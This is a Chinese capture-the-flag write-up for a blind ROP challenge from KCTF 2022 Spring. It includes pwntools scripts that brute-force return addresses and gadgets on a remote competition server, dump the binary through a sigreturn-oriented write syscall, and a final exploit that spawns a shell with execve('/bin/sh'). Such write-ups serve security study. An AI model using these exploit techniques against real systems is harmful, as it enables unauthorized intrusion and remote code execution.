KCTF2022春季赛 第六题 writeup
这题,BROP提示给的很明显,所以就是盲打,不管怎么说先问(bao)候(da)一下出题人。
首先我们一开始什么都不知道,就先确定一下一些基本信息,那么就先测试一下缓冲区的长度,最后发现缓冲区长度为0x10。
我们先执行一遍正常流程,大概就是:
输出一句话
输入
输出一句话
当存在栈溢出的时候,最后一句话输出不出来,因此可以断定,溢出是发生在自己定义的函数的。大概写一下伪代码:
1 2 3 4 5 6 7 8 9 10 #include<stdio.h> void func(){ char buf[16]; gets(buf); } int main(){ puts("hacker, TNT!"); func(); puts("TNT TNT!"); }
当然,输出第一句话的语句可能也在 func
里面,但是不影响,我们先爆破第一个字节
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from pwn import *for i in range (0 ,256 ): try : p=remote(host='221.228.109.254' ,port=10100 ) s=p.recvline() payload=b'a' *0x10 +p8(i) print (payload) p.send(payload) ss=(p.recvline(timeout=1 )) print (ss) p.close() except : p.close() continue
可以发现,当覆盖一个 \xb0
字节的时候,程序重新执行了一遍 main
函数,当覆盖一个 \xce
字节的时候,程序执行正常流程退出了,那么我们可以得出以下信息:
main
函数的低位为 0xb0
func
函数的返回地址为 0xce
这里其实可以确定输出第一句话的函数在 main
当中了,因为如果在 func
函数当中,那么一定会存在两个地址使得程序重新执行一遍流程,那就是改成了 func
函数和 main
函数的地址都会这样,没有就说明第一句话输出不在 main
当中。
然后再勇敢地一试,猜测它的地址为 0x4000b0
,结果发现也是重新执行了 main
函数,这也间接断定了这个程序是 64
位的。上面推出的两个地址也确定了。
接下来,就可以尝试取寻找 gadget
了,我们要寻找的首要 gadget
自然就是 pop rdi ret
了。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 from pwn import *main=0x4000b0 ret=0x4000ce for i in range (0x400000 ,0x401900 ): try : while True : try : p=remote(host='221.228.109.254' ,port=10100 ) break except : continue s=p.recvline() payload=b'a' *0x10 +p64(i)+p64(ret)+p64(main) print (payload) p.send(payload) ss=(p.recvline(timeout=1 )) print (ss) p.close() except : p.close() continue
在这个 payload
当中,可以发现,如果寻找的 gadget
为 ret
,那么则会继续流程,如果 gadget
类似于 pop xxx ret
的话则会重新执行 main
函数。结果 ret
找到了很多,其它的 gadget
愣是没找到一个,于是决定往后面再加一个 p64(main)
,结果居然找到了七个地址:
1 2 3 4 5 6 7 8 9 a0x4000f5 pop xxx *2;ret 0x4000fa pop xxx *2;ret 0x4000fb pop xxx *2;ret 0x4000fd pop xxx *2;ret 0x4000fe pop xxx *2;ret 0x400100 pop xxx *2;ret 0x400101 ret 0x400102 pop xxx *2 ; ret 0x400106 ret
然后我尝试取寻找它的 IO
函数去输出它的 got
表,但是测了很多地址都没有发现有输出 \n
字节,这里也排除它用 puts
函数输出的可能,但是它可能也用了 printf
或者是 write
函数之类的,但是我还是往 printf
去想而没有往 write
去想。然后我就拿那些 gadget
试着传参看看,结果不出意外都失败了,无任何回显。
这里我困扰了很久,后来我们队的 ThTsOd
师傅给了我一个很重要的思路,那就是
再来看看精致得分的规则:
直接拉满了那就很能说明问题了,肯定是甚至没有 plt
或者 got
表的那种文件,直接用的 syscall
才能有这么小的长度。
这里借用以下 ThTsOd
师傅的脚本,帮我们确定了一些 syscall
的位置。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 from pwn import *context.log_level='warn' main=0x4000b5 ret=0x400101 pop_rdi = 0x400101 - 1 pop_rsi_2 = 0x400101 - 3 ''' 0x4000b0 0 b'hacker, TNT!\n' 0x4000ce 0 b'TNT TNT!\n' INPUT 0x4000b5 0 b'TNT TNT!\n' 0x4000b6 0 b'TNT TNT!\n' 0x4000b8 0 b'TNT TNT!\n' 0x4000c2 0 b'TNT TNT!\n' 0x4000c7 0 b'TNT TNT!\n' 0x4000c9 0 b'TNT TNT!\n' rdi 1 rsi str rdx len ''' for k in range (1 ): for i in range (0x400000 ,0x400120 ): try : while True : try : p=remote(host='221.228.109.254' ,port=10005 ) break except : continue s=p.recv() payload=b'a' *0x10 +p64(i)+p64(pop_rdi)*3 +p64(1 )+p64(pop_rsi_2)+p64(0x400000 )*2 +p64(0x4000ce ) p.send(payload) p.send('B' ) ss=(p.recvall(timeout=1 )) print (hex (i),k,ss) p.close() except : p.close() continue ''' 41 5c 41 5d 41 5e 41 5f c3 rdi 1 rsi str rdx len 101 RET 102 POP 106 RET '''
在这个脚本中,我们通过修改 rax
的值成功调用sys_read
dump
出了栈上面的内存。
由此我们确定了 syscall ret
的 gadget
在 0x4000ec
的地方。但是还需要有一个固定能 read
的 gadget
才行,因为只有这样我们才能控制 rax
寄存器的值,来选择我们需要的系统调用。
当然我们也找到了,在0x4000f3
,并且发现需要传两个参数才能把 rop
链拼接上去,感觉这里两个参数应该是 add rsp,0x10
产生的。
那也不用管那么多了,通过这两个 gadget
我们就能进行一次指定的系统调用,这里我们不选择使用 write
调用泄露栈的内存,我们直接把 elf
的内存给 dump
出来就行,因为没有 gadget
那我们直接用 sigreturn
的方式控制寄存器。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 from pwn import *context.log_level='debug' context.arch='amd64' main=0x4000b5 ret=0x400101 pop_rdi = 0x400101 - 1 pop_rsi_2 = 0x400101 - 3 syscall=0x4000ec sysread=0x4000f3 ''' 0x4000b0 0 b'hacker, TNT!\n' 0x4000ce 0 b'TNT TNT!\n' INPUT 0x4000b5 0 b'TNT TNT!\n' 0x4000b6 0 b'TNT TNT!\n' 0x4000b8 0 b'TNT TNT!\n' 0x4000c2 0 b'TNT TNT!\n' 0x4000c7 0 b'TNT TNT!\n' 0x4000c9 0 b'TNT TNT!\n' rdi 1 rsi str rdx len ''' for k in range (1 ): for i in range (0x4000f3 ,0x4000f4 ): try : while True : try : p=remote(host='221.228.109.254' ,port=10088 ) break except : continue s=p.recv() rop=SigreturnFrame() rop.rax=1 rop.rdi=1 rop.rip=syscall rop.rsp=0x400000 rop.rbp=0x400000 rop.rsi=0x400000 rop.rdx=0x400 payload=b'a' *0x10 +p64(sysread)+p64(0 )*2 +p64(syscall)+eval (str (rop)) p.send(payload) p.send('B' *15 ) p.interactive() except : p.close() continue ''' 41 5c 41 5d 41 5e 41 5f c3 rdi 1 rsi str rdx len 101 RET 102 POP 106 RET '''
可以看到我们就成功用 sigreturn
调用了 sys_write(1,0x400000,0x400)
,至此终于不是瞎子视角了,这里再是 ThTsOd
师傅帮我重建了 ELF
文件,IDA
一开
其实现在 IDA
已经不重要了,主要还是能本地调试就非常爽。
但是这里又卡了一个关,那就是找不到确定地址可写的地方写上 /bin/sh
。这里又双叒叕是 ThTsOd
师傅向我指明了 0x600000
处的内存是可读可写的。
打开一看果然是这样,而且给的内存还挺多,那就爽了,直接先调用 sys_read
再上面写上 /bin/sh
顺便接上 rop
链,然后再一次 sigreturn
执行 execve('/bin/sh',0,0)
去获得 shell
。
最终 exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 from pwn import *context.log_level='debug' context.arch='amd64' main=0x4000b5 ret=0x400101 syscall=0x4000ec sysread=0x4000f3 p=remote(host='221.228.109.254' ,port=10100 ) s=p.recv() rop=SigreturnFrame() rop.rax=0 rop.rdi=0 rop.rip=syscall rop.rsp=0x600020 rop.rbp=0x600020 rop.rsi=0x600000 rop.rdx=0x400 payload=b'a' *0x10 +p64(syscall)+p64(syscall)+eval (str (rop)) p.send(payload) p.send(b'a' *15 ) rop.rax=59 rop.rip=syscall rop.rdi=0x600000 rop.rdx=0 rop.rsi=0 sleep(1 ) p.send(b'/bin/sh\0' +p64(sysread)+p64(0 )*2 +p64(syscall)+eval (str (rop))) sleep(1 ) p.send(b'a' *15 ) p.interactive()
这题后面不难,主要是想办法 dump
内存重建 elf
,然后就是签到的做法了。
题外话:那我不禁对那个精致分仅有 87
分的 pwn
题瑟瑟发抖了。